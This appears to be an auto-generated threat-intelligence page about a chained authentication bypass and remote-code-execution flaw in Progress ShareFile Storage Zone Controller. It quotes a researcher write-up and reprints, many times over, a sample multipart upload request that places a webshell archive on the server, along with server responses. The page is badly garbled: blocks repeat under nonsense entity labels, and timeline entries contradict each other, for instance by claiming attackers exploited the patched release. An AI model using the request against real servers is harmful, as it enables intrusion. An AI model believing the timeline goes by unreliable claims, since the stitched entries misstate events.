INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
Progress ShareFile Pre-Auth RCE Chain Vulnerability
| 2026-04-02 13:33 CRITICAL HIGHExecutive Summary AI-generated
The ShadowServer Foundation has identified a critical vulnerability in Progress ShareFile, an enterprise-grade secure file transfer solution. The flaw allows attackers to chain two vulnerabilities - authentication bypass and remote code execution - to enable unauthenticated file exfiltration from affected environments. Researchers at offensive security company watchTowr discovered the issue in branch 5.x of Progress ShareFile, which has been addressed in version 5.12.4. This vulnerability can be exploited by attackers to gain pre-authentication access and execute malicious code on the server. The ShadowServer Foundation is aware of the potential threat and has taken steps to mitigate it, but its exact impact remains unclear due to the large number of affected Storage Zone Controller instances exposed on the public internet.
Technical Mitigations AI-generated
* Implement secure authentication and authorization mechanisms, such as multi-factor authentication (MFA) and role-based access control (RBAC), to prevent unauthorized access to the Storage Zones Controller (SZC) component.
* Regularly update and patch Progress ShareFile versions to ensure that known vulnerabilities are addressed before they can be exploited by threat actors.
* Monitor system logs and network traffic for suspicious activity, such as unusual file transfers or changes in storage zone configurations, which could indicate a Pre-Authenticated Remote Code Execution (Pre-ARC) attack.
* Conduct automated pentesting and vulnerability scanning of systems running vulnerable versions of Progress ShareFile Storage Zone Controller to identify potential entry points for attackers.
Technical Observables
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
CVE-2026-2701CVE-2026-2701
CVE-2026-2699CVE-2026-2699
Target & Sectors
Global Scope
Incident Timeline
February 2026
Threat actors used watchTowr's Python PoC to chain Authentication Bypass WT-2026-0006 and Remote Code Execution WT-2026-0007 attacks.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-2701
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
tactic
Remote Code Execution
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
6th February 2026
watchTowr hunts across client attack surfaces for exposure
6th February 2026
Progress Security Team acknowledges receipt of disclosure for WT-2026-0006
13th February 2026
watchTowr discloses Remote Code Execution Vulnerability WT-2026-0007 to Progress Security Team.
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
general_metric
2701 Remote Code Execution
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
tactic
T1059.006 - Python
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
organisation
the Authentication Bypass
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
organisation
Timeline
Date
Timeline
Date
Detail
6th February 2026
watchTowr discloses Authentication Bypass WT-2026-0006 to Progress Security Team.
organisation
Detail
Timeline
Date
Detail
6th February 2026
watchTowr discloses Authentication Bypass WT-2026-0006 to Progress Security Team.
organisation
Progress Security Team
Timeline
Date
Detail
6th February 2026
watchTowr discloses Authentication Bypass WT-2026-0006 to Progress Security Team.
14th February 2026
Threat actors used a pre-authentication Remote Code Execution (RCE) vulnerability in the ShareFile system to gain unauthorized access.
18th February 2026
Threat actors exploited a pre-authentication Remote Code Execution (RCE) vulnerability in the ShareFile system to gain unauthorized access.
February 18
Threat actors used a pre-auth RCE vulnerability in Progress ShareFile 5.12.4 to chain flaws discovered by watchTowr between February 6 and 13, with the full exploit confirmed on February 18.
Click on any entity below to view its context and source!
general_metric
0006 WT-2026
watchTowr discovered the two flaws and reported them to Progress between February 6 and 13, and the full exploit chain was confirmed on February 18 for Progress ShareFile 5.12.4.
general_metric
13 February
watchTowr discovered the two flaws and reported them to Progress between February 6 and 13, and the full exploit chain was confirmed on February 18 for Progress ShareFile 5.12.4.
March 10, 2026
Threat actors exploited a pre-authentication Remote Code Execution (RCE) vulnerability in ShareFile's Progress share feature to gain unauthorized access.
Click on any entity below to view its context and source!
infrastructure
5.12.4
These vulnerabilities were resolved in version
5.12.4
, release to ShareFile customers on branch 5.x on March 10, 2026.
10th March 2026
Threat actors exploited a pre-authentication remote code execution vulnerability in the Storage Zone Controller 5.12.4 by chaining it with another known flaw to gain unauthorized access.
Click on any entity below to view its context and source!
infrastructure
5.12.4
10th March 2026
watchTowr observes the release of Storage Zone Controller
5.12.4
and confirms it remediates the disclosed vulnerabilities.
March 10
Threat actors exploited vulnerabilities in Progress ShareFile 5.12.4 to target the software on March 10.
Click on any entity below to view its context and source!
infrastructure
5.12.4
Following watchTowr's responsible disclosure, the problems have been addressed in Progress ShareFile 5.12.4, released on March 10.
The vendor released security updates in version 5.12.4, released on March 10.
April 02 2026
Threat actors used a vulnerability in the Tracker software to target an exploit for CVE-2026-2701 Remote Code Execution.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-2699
the tracker CVE-2026-2699 and requests an embargo until April 02 2026.
vulnerability
CVE-2026-2701
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
tactic
Remote Code Execution
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
general_metric
2701 Remote Code Execution
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
WT-2026-0007
Threat actors used a Python PoC to chain Authentication Bypass and Remote Code Execution vulnerabilities (CVE-2026-2701) in ShareFile, allowing for Pre-Authenticated Remote Code Execution.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-2701
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
It’s at this point that we have to highlight a caveat we observed with this functionality: it can only be executed if the server-side is authenticated with the ShareFile SaaS, which is pretty common, as this is a requirement for the Storage Zone Controller to work as intended.
WT-2026-0007 (CVE-2026-2701) - Post-Auth Remote Code Execution
Since we have shown that we can bypass authentication and modify the current ShareFile passphrase, we have one final step:
When you think about it, it should be a fairly easy task.
tactic
Remote Code Execution
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
It’s at this point that we have to highlight a caveat we observed with this functionality: it can only be executed if the server-side is authenticated with the ShareFile SaaS, which is pretty common, as this is a requirement for the Storage Zone Controller to work as intended.
WT-2026-0007 (CVE-2026-2701) - Post-Auth Remote Code Execution
Since we have shown that we can bypass authentication and modify the current ShareFile passphrase, we have one final step:
When you think about it, it should be a fairly easy task.
6th February 2026
watchTowr hunts across client attack surfaces for exposure
6th February 2026
Progress Security Team acknowledges receipt of disclosure for WT-2026-0006
13th February 2026
watchTowr discloses Remote Code Execution Vulnerability WT-2026-0007 to Progress Security Team.
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
general_metric
2701 Remote Code Execution
26th February 2026
Progress Security Team assigns the Remote Code Execution (WT-2026-0007) the tracker CVE-2026-2701 and requests an embargo until April 02 2026.
organisation
the Storage Zone Controller
It’s at this point that we have to highlight a caveat we observed with this functionality: it can only be executed if the server-side is authenticated with the ShareFile SaaS, which is pretty common, as this is a requirement for the Storage Zone Controller to work as intended.
WT-2026-0007 (CVE-2026-2701) - Post-Auth Remote Code Execution
Since we have shown that we can bypass authentication and modify the current ShareFile passphrase, we have one final step:
When you think about it, it should be a fairly easy task.
organisation
Post-Auth Remote Code Execution
It’s at this point that we have to highlight a caveat we observed with this functionality: it can only be executed if the server-side is authenticated with the ShareFile SaaS, which is pretty common, as this is a requirement for the Storage Zone Controller to work as intended.
WT-2026-0007 (CVE-2026-2701) - Post-Auth Remote Code Execution
Since we have shown that we can bypass authentication and modify the current ShareFile passphrase, we have one final step:
When you think about it, it should be a fairly easy task.
tactic
T1059.006 - Python
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
organisation
the Authentication Bypass
16th February 2026
watchTowr provides a Python PoC that chains the Authentication Bypass (WT-2026-0006) and the Remote Code Execution (WT-2026-0007) to achieve Pre-Authenticated Remote Code Execution.
2026/04/02
Attackers can obtain remote code execution on the server by abusing file upload and extraction functionality to place malicious ASPX webshells in the application’s webroot.
Click on any entity below to view its context and source!
tactic
Remote Code Execution
The following represent industry-defining historical incidents:
Today, we find ourselves analyzing the journey we took to discover multiple vulnerabilities in Progress ShareFile, ultimately chained together to achieve Pre-Authenticated Remote Code Execution - and sharing more memes.
Today, we’ll be discussing, analyzing and chaining the following:
CVE-2026-2699 / WT-2026-0006 - Authentication Bypass
CVE-2026-2701 / WT-2026-0007 - Remote Code Execution
ShareFile comes in two major branches for applications hosted within an IIS setup:
Branch 6.x - Built using .NET Core
Branch 5.X - Built using ASP.NET
Although our research did at different points focus on both branches, both vulnerabilities discussed today are specific to branch 5.X - specifically, we identified these new vulnerabilities within version
StorageCenter_5.12.3
which was the latest version at the time of writing.
Dissecting The ShareFile Storage Zone Controller
We set out with the goal of trying to achieve a complete compromise of a ShareFile Storage Zone Controller from a Pre-Authenticated perspective, that's right, today we’re talking about Remote Code Execution.
organisation
Progress ShareFile
The following represent industry-defining historical incidents:
Today, we find ourselves analyzing the journey we took to discover multiple vulnerabilities in Progress ShareFile, ultimately chained together to achieve Pre-Authenticated Remote Code Execution - and sharing more memes.
Two vulnerabilities in Progress ShareFile, an enterprise-grade secure file transfer solution, can be chained to enable unauthenticated file exfiltration from affected environments.
organisation
Pre-Authenticated Remote Code Execution
The following represent industry-defining historical incidents:
Today, we find ourselves analyzing the journey we took to discover multiple vulnerabilities in Progress ShareFile, ultimately chained together to achieve Pre-Authenticated Remote Code Execution - and sharing more memes.
vulnerability
CVE-2026-2699
Today, we’ll be discussing, analyzing and chaining the following:
CVE-2026-2699 / WT-2026-0006 - Authentication Bypass
CVE-2026-2701 / WT-2026-0007 - Remote Code Execution
ShareFile comes in two major branches for applications hosted within an IIS setup:
Branch 6.x - Built using .NET Core
Branch 5.X - Built using ASP.NET
Although our research did at different points focus on both branches, both vulnerabilities discussed today are specific to branch 5.X - specifically, we identified these new vulnerabilities within version
StorageCenter_5.12.3
which was the latest version at the time of writing.
How the attack works
In a report today,
watchTowr researchers explain
that the attack begins by exploiting the authentication bypass issue, CVE-2026-2699, which gives access to the ShareFile admin interface due to improper handling of HTTP redirects.
vulnerability
CVE-2026-2701
Today, we’ll be discussing, analyzing and chaining the following:
CVE-2026-2699 / WT-2026-0006 - Authentication Bypass
CVE-2026-2701 / WT-2026-0007 - Remote Code Execution
ShareFile comes in two major branches for applications hosted within an IIS setup:
Branch 6.x - Built using .NET Core
Branch 5.X - Built using ASP.NET
Although our research did at different points focus on both branches, both vulnerabilities discussed today are specific to branch 5.X - specifically, we identified these new vulnerabilities within version
StorageCenter_5.12.3
which was the latest version at the time of writing.
infrastructure
12.3
Today, we’ll be discussing, analyzing and chaining the following:
CVE-2026-2699 / WT-2026-0006 - Authentication Bypass
CVE-2026-2701 / WT-2026-0007 - Remote Code Execution
ShareFile comes in two major branches for applications hosted within an IIS setup:
Branch 6.x - Built using .NET Core
Branch 5.X - Built using ASP.NET
Although our research did at different points focus on both branches, both vulnerabilities discussed today are specific to branch 5.X - specifically, we identified these new vulnerabilities within version
StorageCenter_5.12.3
which was the latest version at the time of writing.
general_metric
0007 WT-2026
Today, we’ll be discussing, analyzing and chaining the following:
CVE-2026-2699 / WT-2026-0006 - Authentication Bypass
CVE-2026-2701 / WT-2026-0007 - Remote Code Execution
ShareFile comes in two major branches for applications hosted within an IIS setup:
Branch 6.x - Built using .NET Core
Branch 5.X - Built using ASP.NET
Although our research did at different points focus on both branches, both vulnerabilities discussed today are specific to branch 5.X - specifically, we identified these new vulnerabilities within version
StorageCenter_5.12.3
which was the latest version at the time of writing.
organisation
ShareFile
How the attack works
In a report today,
watchTowr researchers explain
that the attack begins by exploiting the authentication bypass issue, CVE-2026-2699, which gives access to the ShareFile admin interface due to improper handling of HTTP redirects.
In ShareFile’s own words:
ShareFile software gives you a structured, secure space to work with clients - share files, collect signatures, request data, and manage to-dos in one place, improving collaboration and the experience around it.
organisation
Functionality
Functionality is presented to us that can be interacted with without authentication, but we’ll get to that.
organisation
The ShadowServer Foundation
The ShadowServer Foundation currently observes
700 internet-exposed instances
of Progress ShareFile, most of which are located in the United States and Europe.
organisation
SolarWinds Serv-U
Such solutions are an attractive target for ransomware actors, as previously seen in Clop data-theft attacks exploiting bugs in
Accellion FTA
,
SolarWinds Serv-U
,
Gladinet CentreStack
,
GoAnywhere MFT
,
MOVEit Transfer
, and
Cleo
.
organisation
MFT
Such solutions are an attractive target for ransomware actors, as previously seen in Clop data-theft attacks exploiting bugs in
Accellion FTA
,
SolarWinds Serv-U
,
Gladinet CentreStack
,
GoAnywhere MFT
,
MOVEit Transfer
, and
Cleo
.
organisation
Pre-Auth RCE Chain CVE-2026-2699
You’re Not Supposed To ShareFile With Everyone (Progress ShareFile Pre-Auth RCE Chain CVE-2026-2699 & CVE-2026-2701).
organisation
WT-2026-0006
WT-2026-0006 (CVE-2026-2699) - Authentication Bypass Vulnerability
To start, we list out all of the
.aspx
files within the application and send requests to the server to observe the response.
organisation
SZC
Researchers at offensive security company watchTowr discovered an authentication bypass (CVE-2026-2699) and a remote code execution (CVE-2026-2701) in the Storage Zones Controller (SZC) component present in branch 5.x of Progress ShareFile.
organisation
CVE-2026
Although we’d typically provide a DAG that leverages both identified weaknesses to produce comprehensive detection artifacts for your environment, ‘boilerplate’ validation of CVE-2026-2701 impacts the availability of targeted systems.
organisation
DLL
Routes such as REST endpoints defined within the
web.config
that is also backed by the DLL’s code
organisation
Content-Disposition
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
organisation
filename="test.zip
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
data_breach
1 ------WebKitFormBoundary7MA4YWxkTrZu0gW
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
data_breach
2 ------WebKitFormBoundary7MA4YWxkTrZu0gW
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
ShareFileFileId; // [2]
string text3 = ShareFile.
data_breach
3 ------WebKitFormBoundary7MA4YWxkTrZu0gW
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
data_breach
123 ------WebKitFormBoundary7MA4YWxkTrZu0gW
Sample HTTP Request that exploits this vulnerability looks like this:
POST /upload.aspx?id=803436333&uploadid=jtrazo53&bp=test&accountid=1&exp=1970804033&h=ARcXg5ZqhVKOrlvNmzXjDeOaJIPHkjXX3OrmVJnB090= HTTP/1.1
Host: sharefile.lab.local
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 1873
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bp"
testz\\a
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="accountid"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bm"
2
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bo"
3
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="uploadid"
123
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="rsu"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="NeatUpload_PostBackID"
12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="onfinishurl"
<
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="unzip"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="File1"; filename="test.zip"; UniqueID="File1"
Content-Type: text/plain
zip-file-with-webshell-here
We are not done yet, though.
organisation
Cache-Control
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Content-Type
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Microsoft
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Access-Control-Allow-Origin
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Access-Control-Max-Age
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
Access-Control-Allow-Headers
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
POST
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Date: Mon, 23 Mar 2026 01:59:44 GMT
Content-Length: 22448
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/ConfigService/Login.aspx?callerpage=Admin">here</a>.</h2>
</body></html>
<!DOCTYPE html
organisation
OPTIONS
HTTP/1.1 302 Found
Cache-Control: private,no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: /ConfigService/Login.aspx?callerpage=Admin
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 540
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
